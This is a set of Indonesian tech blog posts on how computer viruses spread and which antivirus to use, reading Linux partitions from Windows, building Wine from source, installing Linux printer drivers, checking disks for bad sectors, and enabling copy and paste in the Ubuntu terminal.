Media ini paling sering digunakan oleh banyak pengguna komputer di seluruh dunia, dan sebagian besar juga virus dan malware berkeliaran lewat media ini. Dalam hal ini, pengguna diharapkan jeli sebelum mengklik suatu link, website, maupun iklan - iklan yang bertebaran di Internet karena, biasanya iklan tersebut mengandung virus. Lebih amannya anda tidak usah mengklik situs , link, atau iklan tersebut karena kebanyakan link tersebut akan membawa anda atau bisa memaksa anda mengunduh program jahat untuk anda eksekusi.

2. Storage Media
Storage Media meliputi flashdisk, memory eksternal, dan lain-lainnya yang berhubungan dengan media penyimpanan. Bahkan virus tersebut bisa menempel di smartphone pengguna, misal Android, iPhone, dll dengan memanfaatkan memory external pengguna Smartphone.

Contoh penyebaran virus paling banyak terjadi di Flashdisk. Bagi yang sering ke warnet, bukan tidak mungkin, pastinya sekitar 80% flashdisk yang sudah tertancap di komputer warnet anda pasti disusupi oleh virus. Hasil survei penulis, sekitar 90% lebih Warnet di daerah Penulis, tepatnya di Bali, telah tertanam virus. Contoh virusnya:
Recycler,Banyak Shortcut yang diciptakan diflashdisk tersebut.

Untuk menangani virus di yang menyebar seperti ini sebenarnya gampang dan banyak cara. Misal: cek file apa yang ada dimedia, bila ada penambahan file secara tidak wajar, bisa dipastikan itu file virus. Untuk menghapusnya bisa gunakan Linux, LiveUSB/CD/DVD Windows.

3. Teman/Musuh
Pastinya yang ini adalah hal yang sangat umum, mungkin karena Teman anda jahil, atau  Musuh anda tidak suka anda lalu menyusupi komputer anda dengan virus. Satu2 nya cara menanganinya adalah "mungkin" menggantung teman anda di jemuran terdekat, atau mutilasi musuh anda (Warning! Cara ini sangat tidak disarankan!).

4. Antivirus
Lho kok bisa? Program antivirus juga sering disalah gunakan oleh pembuatnya, seperti 
contoh berita di situs ini:
Antivirus palsu
Penulis menyarankan untuk menginstall program antivirus yang terpercaya yang akan disebutkan nanti.

5. Dan Lain - Lain
Karena perkembangan teknologi yang pesat maka perkembangan kejahatan semakin meningkat pula. Jadi pengguna diharapkan waspada terhadap program-program baru, dan jangan terburu-buru untuk mengeksekusi suatu program aplikasi.
Penulis menyarankan untuk selalu menggunakan Antivirus. Minimal 2 Antivirus untuk sedikit melindungi komputer dari gangguan tersebut. 1 dari vendor Luar Negeri, dan 1 dari vendor Lokal.

1.) Dari Luar Negeri: Avira, Avast, AVG, EsetNOD32
2.) Dari Lokal: Smadav, PCMAV

Cara Membaca Partisi Linux di Windows

0


Jika ingin membaca file pada Extended File System menggunakan OS windows, anda bisa melakukannya dengan alikasi  kecil yang dinamakan Ext2Explore yang bersifat open source dan bisa didownload dengan gratis.

Berikut kami berikan tutorial bagaimana cara membaca partisi linux menggunakan aplikasi Ext2Explore di Windows :

1. Download aplikasi Ext2Read ke PC atau notebook. (Link download ada di bagian akhir artikel)

2. Ekstrak file ZIP yang telah didownload menggunakan 7Zip, WinZip atau WinRar.

3. Jalankan file Ext2Explore yang telah diekstrak tadi.

4. Jika menggunakan Windows XP, anda tidak akan menemui banyak masalah karena aplikasi
    sepertinya memang dibuat untuk Windows XP. Tetapi, jika menggunakan Windows 7, anda
    mungkin harus merubah properties-nya agar kompatibel dengan windows 7. Caraya, klik kanan
    Ext2Explore, pilih properties dan lanjutkan dengan mengeklik Tab Compatibility. Selanjutnya beri
    tanda pada bagian Run this program in compatibility for dan pilih Windows XP (Service Pack 3).


5. Klik tombol OK dan jalankan aplikasi tersebut.
6. Setelah itu, aplikasi Ext2Explore secara otomatis akan mendeteksi partisi linux pada komputer.


7. Jika menemukan kesalahan atau terjadi error saat pembacaan, coba tutup dan buka lagi aplikasi ini.
    Pastikan juga anda login menggunakan user administrator, bukan user yang lain.
8. Jika ingin menyimpan file pada partisi windows, klik kanan file yang akan disimpan dan klik Save.

9. Tunggu sampai proses copy selesai, baru anda bisa membuka file hasil cpoy tersebut.


10. Jangan lupa tutup aplikasi Ext2Explore jika selesai menggunakannya.

Kesimpulan :
Meskipun dengan tips ini anda tidak bisa menyimpan atau merubah isi file pada partisi Linux, setidaknya anda bisa membaca dan mengkopinya ke partisi windows jika dibutuhkan. Solusi menarik bagi yang punya dual OS tanpa harus melakukan restart komputer.

Link download :
Aplikasi Ext2Read di website SourceForge

Selamat mencoba dan perluas wawasan anda tentang dunia teknologi dan informasi dengan mengikuti update di Blog ini ! 



Cara menginstal wine dari file tar.gz dan tar.bz2

Cara menginstal wine dari file tar.gz dan tar.bz2

0
Terlebih dahulu kita download filenya di sini


Ektrak file tersebut, bisa dengan klik kanan extract here atau via ter terminal :

~$ tar -xjf wine-1.5.14.tar.bz2  atau  tar -xzf wine-1.5.14.tar.gz

perbedaan kedua diatas hanya di huruf j dan z

ketika kita mengetik tulisan diatas tentunya masuk dulu ke dalam folder yang ada file tersebut. Kemudian setelah di extrack, kita masuk ke dalam folder extrackan tersebut

~$ cd wine-1.5.14

kemudian ketik lagi

~$ ./configure

pastikan tidak ada masalah ketika penginstalan, jika ada masalah ya cari dulu paket pendukung yang lain. Ini akan membutuhkan waktu lama. Kemudian setelah selesi lakukan kompilasi dengan cara

ketika di terminal

~$ make

lalu instal sebagai root

~$ sudo su

ketik pasword (seperti biasa pasword tidak akan kelihatan) lalu ketik lagi

~$ make install

Cara Mengaktifkan Printer di Linux

0


Bagi kamu yang masih beranggapan bahwa dukungan di linux masih minim terutama dukungan Printer, kini tak usah cemas atau bingung. Semakin hari linux semakin banyak dilirik oleh para pengembang perangkat keras, install printer kini semakin mudah dengan banyaknya software / driver yang tersedia di Web official bahkan jika Anda beruntung tanpa perlu install driver-pun tinggal colok-jalan.

JENIS DAN MEREK PRINTER
Bermacam-macam printer dari type deskjet, inkjet, LFP ataupun scanner tersedia juga buat platform linux. Dari  merk terkenal seperti Canon, Epson maupun HP kini dengan mudahnya di tanam di Linux.

DOWNLOAD DRIVER PRINTER
Untuk download driver printer silahkan cek di link berikut ini:

EPSON

Untuk kamu yang memiliki merk printer ini silahkan ke link berikut KLIK

CANON

Untuk jenis printer ini silahkan ke link berikut KLIK

HP

Untuk Jenis printer ini silahkan ke link berikut KLIK



Jadi gak ada alasan lagi kan untuk beralih ke Linux? 
Tips Cek BadSector Harddisk di Linux

Tips Cek BadSector Harddisk di Linux

0
Bagi yang merasakan performa harddisknya menurun atau mungkin ada bagian partisi yang error atau tidak bisa diakses mungkin harddisk kamu mengalami badsector. Sebelum berniat membeli atau membuang harddisk yang lama, tak ada salahnya mencoba tips berikut.

Bad sector adalah suatu tanda yang menyatakan bahwa ada bagian tertentu dari fisik perangkat keras yang mengalami kerusakan sehingga tidak digunakan lagi. Tanda bad sectorbiasanya dibuat pad saat memformat perangkat keras dan oleh program diagnosa.


1. Idetifikasikan dulu perangkat yang akan di check, bisa menggunakan perintah dibawah ini :

~$ sudo fdisk -l

             atau

~$ sudo df -h

2. Misal untuk kasus ini saya mencoba mengcheck partisi pertama sda1

~$ sudo badblocks -v /dev/sda1 > hasil_badsector.txt

Jika langkah diatas sudah selesai, selanjutnya adalah menggenerate hasil_badsector untuk diidentifikasi.

~$ sudo e2fsck -l hasil_badsector.txt /dev/sda1

Mengaktifkan Ctrl+C (Copy) & Ctrl+V (Paste) di Terminal Ubuntu

Mengaktifkan Ctrl+C (Copy) & Ctrl+V (Paste) di Terminal Ubuntu

0

Pada standar terminal untuk copy dan paste harus menggunakan mouse/touchpad dengan mengklik kanan lalu pilih Copy/Paste. Sedangkan untuk Keyboard Shortcuts (Ctrl+C dan Ctrl+V) tidak aktif atau tidak berfungsi di terminal.


Cara Mengaktifkan Ctrl+C (copy) & Ctrl+V (paste) Di Terminal Ubuntu :

1. Open terminal - Ctrl+Alt+T

2. Ketikkan perintah berikut di terminal :
~$ gconftool-2 -s /apps/gnome-terminal/keybindings/copy -t str 'c'
~$ gconftool-2 --type string --set /apps/gnome-terminal/keybindings/paste 'v'

3. Setelah perintah di masukkan, coba gunakan keyboard shorcuts-nya, jika belum bisa, restart dulu.

4. Jika sebelumnya "Ctrl+C" digunakan untuk Menghentikan suatu proses pada terminal, karena sudah
    diganti dengan fungsi "Copy" maka untuk menghentikan suatu proses di terminal, gunakan
    Shift+Ctrl+C.

   
      Enjoy :)